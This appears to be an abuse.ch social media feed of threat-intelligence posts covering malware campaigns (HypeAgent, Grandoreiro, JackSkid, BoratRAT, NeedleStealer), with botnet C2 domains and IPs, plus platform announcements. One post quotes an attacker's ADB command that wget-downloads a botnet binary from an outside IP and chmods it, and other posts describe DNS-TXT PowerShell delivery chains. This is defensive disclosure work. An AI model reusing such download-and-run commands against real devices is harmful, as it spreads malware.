Sign in

abuse-ch.bsky.social

@abuse-ch.bsky.social
501 followers 3 following 238 posts

Fighting malware and botnets

PostsRepliesMedia
abuse-ch.bsky.social @abuse-ch.bsky.social · 07/10/2026
Why the change? Some users were pulling exports too often, putting extra strain on the platforms. This feature matters to the community, so we want to keep it running smoothly for everyone 💪 👉 Authenticate now so you're ready: auth.abuse.ch #ThreatIntel #SharingIsCaring
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 07/10/2026
📄 Example URL: mb-api[.]abuse[.]ch/v2/files/export…
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 07/10/2026
What authenticated users need to do: ➡️ Switch to the new domain: {{platform}}-api.abuse.ch (urlhaus, threatfox, or mb for MalwareBazaar) ➡️ Add your Auth-Key (get it at auth.abuse.ch) to the URL, right before the file name
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 07/10/2026
🚨 Heads up: file exports are changing from October 21st Exports will require authentication. Already authenticated? You can keep exporting, there's just a small change to the export URLs👇
abuse.ch and Spamhaus logos above bold text on a dark teal background: "Access to file exports is changing from October 21st. Are you authenticated?"
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/09/2026
Did you know that if you run Cowrie SSH and Telnet honeypot 🍯🐝, you can automatically submit malicious URLs caught by it to URLhaus 💡? If you aren't running a Cowrie honeypot yet, you may want to check it out: Project website: 🖥️ cowrie.org GitHub repository: 🖱️ github.com/cowrie/cowrie
Cowrie SSH and Telnet honeypot
020
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/09/2026
A couple of months in and the Community Hub is thriving 🤩 ... 36,441 contributions across all platforms in the last 30 days (+30.8%) 🔥🔥🔥 @geenensp 🥇 on URLhaus (78-month streak!!) @TheRavenFile 🥇 on ThreatFox @whack_sh 🥇 on MalwareBazaar Go see the full Top10 leaderboards 💛 👉 community.abuse.ch
010
abuse-ch.bsky.social @abuse-ch.bsky.social · 14/09/2026
Nice try, but their new C2 domain is already flagged🛑. Its authoritative DNS runs on DNSPod (*.dnspod.com), which has carried a poor reputation for years! 💡 ⤵️⤵️⤵️⤵️ hunting.abuse.ch/hunt/6aa7e82...
hunting.abuse.ch
Hunt for spamhaushackers.at/ on abuse.ch
Hunt for CTI related to spamhaushackers.at on abuse.ch Hunting Platform
021
abuse-ch.bsky.social @abuse-ch.bsky.social · 14/09/2026
We recently sinkholed a DDoS #botnet of 200,000 compromised Android TV boxes infected with #CECbot malware 🕵️‍♀️. Shortly after, the threat actor responded by registering a rather specific botnet C2 domain 📡 spamhaushackers .at
abuse.ch Hunting
231
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/09/2026
Consider this our way of saying THANK YOU 🙏 Top contributors - keep an eye out, we'll be reaching out in the coming weeks to get your access sorted 🎉.
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/09/2026
You give your time, brainpower, and expertise to this community 👏. You hunt down the bad guys every single day - we want to make sure you have the best tools 🛠️ available to do what you do for the good of the internet every single day!
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/09/2026
🚨 ANNOUNCEMENT FOR TOP CONTRIBUTORS! 🚨 We’ve been working on something huge and the cat 🐈️ is finally out of the bag 👀 ... we’ve officially partnered with Modat to give FREE Magnify licenses to our top contributors! 🎉🔥
Announcement: New partnership with Modat
120
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2026
Payload delivery: 🌐 recapture-robot .today (PDR 🇮🇳) 🌐 91.193.7.186:49094 (M247 🇯🇵) Botnet C2: 📡 out-agent.duckdns .org 📡 91.193.7.186:48988 (M247 🇯🇵) 📄 Sample: bazaar.abuse.ch/sample/5a8ab...
Malicious DNS TXT record serving a PowerShell script, leading to malware infection with BoratRAT Botnet C2 serving "BoratRat" SSL certificate
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2026
#BoratRAT spreading using similar tactics as #ClickFix 👇 1️⃣ Fake Microsoft Security Verification 🔑 leading to malicious PowerShell execution 🖱️ 2️⃣ Command triggers a DNS TXT request to recapture-robot .today 🌐 to obtain a PowerShell script 📜 3️⃣ Script drops payload, infecting host with BoratRAT 💻
BoratRAT spreading through a ClickFix like lure
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/08/2026
🦊 Further IOCs on ThreatFox: threatfox.abuse.ch/browse/malwa... Admin panel ⤵️
Overlord RAT botnet admin panel
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/08/2026
Overlord RAT 🔌 dropped by Amadey loader 🔥 Botnet C2 server: mypamella .xyz ➡️ NameSilo 🇺🇸 136.175.82.88:443 ➡️ 2ETELECOM🇧🇬 Payload is bulletproof hosted 🛡️at Omegatech LTD 🇳🇱 🌐 urlhaus.abuse.ch/url/3906755/ 📄 Malware sample: bazaar.abuse.ch/sample/ac1f8...
bazaar.abuse.ch
MalwareBazaar - file (OverlordRAT)
file has been detected as OverlordRAT by MalwareBazaar
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/08/2026
🦊 Relevant IOCs are on ThreatFox: threatfox.abuse.ch/browse/tag/N... Stealer admin panel⤵️
NeedleStealer botnet admin panel
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/08/2026
💡 Related C2 infrastructure at Vultr 🇳🇱: 136.244.0.100 .54:8899/api/v1/agent/register 136.244.0.100 .54:8899/api/v1/agent/ws ⚱️ Artifacts: \Sessions\1\BaseNamedObjects\Local\NeedleRemoteAgentSingle C:\Users\user\AppData\Local\Temp\needle-2fa 📄 Malware samples: bazaar.abuse.ch/browse/signa...
bazaar.abuse.ch
MalwareBazaar - NeedleStealer
Hunt for NeedleStealer malware samples on MalwareBazaar
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/08/2026
NeedleStealer 🪡🪝 written in Go ⤵️ 🔎 HTTP user agents observed: User-Agent: Loader-cli/v1 user-agent: Go-http-client/2.0 📡 Botnet C2s, all behind Cloudflare CDN: woolvilli .com/api/v2 allremdeskriki .com/api/v2 dubl1allremriki .com/api/v2 dubl2allremriki .com/api/v2
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
📡 209.54.103.173:7443 HostPapa 🇺🇸 📡 132.243.225.173:7080 QWINS-Hosting 🇩🇪 📡 78.40.209.113:7081 QWINS-Hosting 🇫🇮 📡 31.77.138.55:5654 QWINS-Hosting 🇫🇮 🦊 Releated IOCs on ThreatFox: threatfox.abuse.ch/browse/tag/H... 📄 Releated malware samples on MalwareBazaar: bazaar.abuse.ch/browse/signa...
threatfox.abuse.ch
ThreatFox - Tag HypeAgent
Hunt for IOCs tagged with tag 'HypeAgent'
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
HypeAgent communicates via WebSocket using JSON. Here are some Botnet C2 servers we have been observed ⤵️ 📡 31.40.204.178:7080 WhiteLabel 🇹🇷 📡 94.26.3.211:7443 Stellar Group SAS 🇫🇷 📡 192.109.139.91:7443 Stellar Group SAS 🇺🇸 📡 195.177.94.60:7443 Stellar Group SAS 🇫🇷 📡 107.175.148.122:7443 HostPapa 🇺🇸
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
cookies 🍪 💰 Electron App Webinjects: Intercepts activity on desktop apps like Exodus Wallet 👛 Artifacts observed ⤵️ 1️⃣ Stores stealers logs under C:\Users\USERNAME\AppData\Local\Temp\hype-YYYY-MM-DD.log 2️⃣ Uses HTTP host header "X-Hype-Agent-Token" during botnet C2 communication
HypeAgent botnet C2 communication observed during tria.ge sandbox run
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
🔎 Targeted Harvesting: Steals web browser & email credentials, crypto wallets, and gaming accounts (Steam, Roblox) 🎮 🤖 AI & Platform Cookie Stealing: Targets a list of hardcoded domains like Grok, Anthropic, Coinbase, ByBit, Instagram, and Rockstar Games for which it steals session
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
We identified a new malware called #HypeAgent which acts as information stealer & loader. It is dominantly spread through malspam 📧, first observed on August 1, 2026 🔭👀 Key Capabilities ⤵️ 🕵️ Stealer & Loader: Supports 200+ commands; drops/executes payloads, including crypto miners 💸
130
abuse-ch.bsky.social @abuse-ch.bsky.social · 12/08/2026
Both hosted at AS207043 DEDIK-IO in Germany🇩🇪 📄 Malware sample: bazaar.abuse.ch/sample/5c61c... 🦊 IOCs on ThreatFox: threatfox.abuse.ch/browse/malwa... threatfox.abuse.ch/browse/tag/O...
bazaar.abuse.ch
MalwareBazaar - FLStudio2025_v27_Win.exe (StealC)
FLStudio2025_v27_Win.exe has been detected as StealC by MalwareBazaar
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 12/08/2026
StealC C2s dropping OverlordRAT, using CloudFlare and Microsoft look-a-like domains 👁️ 🌐 cloud-flare-authenticator .link 🌐 cloud-flare-authenticator .click 🌐 update-microsoft-data .services 📡 89.34.90.45:443 OverlordRAT #botnet C2 server ⤵️ 🌐 download-windows-update .live 📡 151.243.113.94:5173
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/08/2026
📡 Grandoreiro botnet C2s hosted at AWS: 54.80.154.193 54.91.129.132 54.91.223.28 🌐 Payloads URLs: urlhaus.abuse.ch/browse/tag/G... 📄 Malware samples: bazaar.abuse.ch/browse/signa... 🦊 Relevant IOCs are available on ThreatFox: threatfox.abuse.ch/browse/malwa...
Fake Adobe PDF document download leading to GrandoreiroGrandoreiro malspam targeting LatAm internet usersGrandoreiro malspam targeting LatAm internet usersGrandoreiro malspam targeting LatAm internet users
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/08/2026
C2 network traffic is rather trivial to detect as #Grandoreiro is using Embarcadero Delphi compilation tools' HTTP user agent 🖥️⤵️ User-Agent: Embarcadero URI Client/1.0 🔎 Botnet C2 domain resolved via Google DNS-over-HTTPS (DoH): devilmaycry.servehumour .com 👀
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/08/2026
Over the past days, active #malspam campaigns targeting LatAm users 🇦🇷🇧🇷🇲🇽 have been delivering the Grandoreiro banking trojan 🏦💰 📧 Email ➔ 📜 JS file ➔ 📑 Fake PDF download Final payload is hosted on MediaFire 🔥 free file hosting
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/08/2026
🇺🇸 1337 Services GmbH: vicspanel .com➡️155.2.192.94 hitstp .com➡️155.2.192.235 vps133panel .com➡️203.159.90.31 🦊 IOCs on ThreatFox: threatfox.abuse.ch/browse/tag/S... 🏠 Payload delivery URLs on URLhaus: urlhaus.abuse.ch/browse/tag/s...
Rogue GitHub user with 19 malicious code repositories
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/08/2026
🔍 Fake #COLDCARD domain with opendir: hardware-data .com ➡️Tucows Domains 🇺🇸 ⚙️ Rogue GitHub user with 19 code repositories: github.com/kaswareteam/ 🔌 ScreenConnect RMM botnet C2s (Port 8041 TCP): 🇺🇸 DeltaHost : hitpanels .com ➡️ 185.174.101.132 hitspanels .com➡️185.174.101.132
Rogue COLDCARD website luring the users into downloading a fake DocuSign package which leads to ScreenConnect RMM
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/08/2026
Rogue #ScreenConnect RMM cluster using a fake @coldcardwallet.bsky.social domain to lure crypto wallet owners 💰 into downloading a fake DocuSign MSI which drops ScreenConnect 🖱️🖥️ ⛓️ Attack Chain: Threat actor domain ➡️ GitHub repo ➡️ ScreenConnect
Fake COLDCARD domain with opendir, leading to rogue ScreenConnect RMM payload
121
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/07/2026
Accounts generating unusually high query volumes may be temporarily limited for up to 72 hours. Repeated or persistent abuse may result in longer-term restrictions on API access. 2/2
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/07/2026
📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as our user base grows, we are introducing API rate limits. 1/2
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 28/07/2026
And every contributor deserves recognition 💛 Head to the Community and claim your profile 👉 abuse.ch/community #LaunchDay #Leaderboards #SharingIsCaring #CommunityHub #ThreatIntel
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 28/07/2026
➡️ Total community contributions ➡️ Top 10 Leaderboards ➡️ Monthly contribution trends across the community ....and a place to track your own impact! Our community is bigger than any one platform. It's a global network of researchers working together to disrupt malware, botnets, and cybercrime.
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 28/07/2026
It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Every day, this community shares data that helps take down malicious infrastructure and now you can see the scale of it, all in one place. The Hub gives you a live view of:
101
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/07/2026
Botnet C2: 📡 threatfox.abuse.ch/ioc/1772413/ 📡 threatfox.abuse.ch/ioc/1838514/
threatfox.abuse.ch
ThreatFox - ricocaseagainst.rebirth.st
ricocaseagainst.rebirth.st is a Unknown malware botnet_cc domain
010
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/07/2026
Delivering #JackSkid using DNS TXT record of ricocaseagainst.rebirth .st as botnet C2: 📡 178.16.52.104 (OMEGATECH 🇩🇪) Payload delivery URLs (STORMCLOUD 🇹🇷): 🌐 urlhaus.abuse.ch/host/94.154.... Malware sample 📄: bazaar.abuse.ch/sample/84984...
urlhaus.abuse.ch
URLhaus - 94.154.43.48
Malware distribution URLs hosted on 94.154.43.48
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/07/2026
JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️ ADB command: ⚙️ shell:busybox wget 94.154.0.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chmod 777 [...]
urlhaus.abuse.ch
URLhaus - 94.154.43.48
Malware distribution URLs hosted on 94.154.43.48
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026
IOCs 📡 %ProgramData%\Microsoft\HTML Help\hhcolreg.dat %APPDATA%\Microsoft\HTML Help\hh.dat threatfox.abuse.ch/ioc/1855885/ threatfox.abuse.ch/ioc/1855883/ Malware sample 📄 bazaar.abuse.ch/sample/32a96...
threatfox.abuse.ch
ThreatFox - sni13.docsmanagement.endl.site
sni13.docsmanagement.endl.site is a Unknown malware payload_delivery domain
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026
global-research .space has been registered almost a year ago, which suggests that this campaign is already running since quite a while 📅 It also returns a fake HTTP 404, which indicates that the payload delivery is restricted to a handful targets 🎯
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026
3️⃣ 207.90.251 .10 returns a PowerShell command as part of the DNS TXT record 4️⃣ Malware executes the PS command and obtains second stage from global-research .space/adv13.php
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026
Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site
Once the malware sample is executed, it displays the following text on the victim's machineMalware obtaining a PowerShell command via DNS TXT record
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 01/07/2026
Something new is coming for abuse.ch contributors... watch this space! 👀 #ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛
011
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
We are sharing details of the involved IPs, along with the relevant timestamps, here for your awareness ⤵️ raw.githubusercontent.com/abusech/misc...
raw.githubusercontent.com
010
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
Below are the top networks sourcing this traffic (by unique IPs): 2,961 AS25019 SAUDINETSTC 🇸🇦 1,995 AS206206 KNET 🇮🇶 1,984 AS9121 TTNet 🇹🇷 1,954 AS3215 Orange 🇫🇷 1,871 AS12322 PROXAD 🇫🇷 1,550 AS5410 BOUYGTEL-ISP 🇫🇷 1,531 AS37705 TOPNET 🇹🇳 1,413 AS8193 BRM-AS 🇺🇿
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
During this incident, the scraping operation leveraged more than 135,000 unique IP addresses, most of which could be identified as nodes in residential proxy networks 🔍 The offender attempted to remain undetected by sending very few requests (less than 5) per IP address to the platforms 🕵
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
However, the sheer volume of traffic caused temporary disruptions to both the MalwareBazaar and URLhaus platforms ⚠️ To put the scale into perspective, our web platforms typically handle approximately 1,500 requests per second (excluding traffic to our community API and commercial APIs).
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 .
Top countries sourcing residential proxy scraping IPs targeting abuse.ch platforms
171
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/06/2026
Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD 🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples ⤵️ hunting.abuse.ch/hunt/6a285c8...
Unidentified botnet C2 trying to hide as FortiGate device
020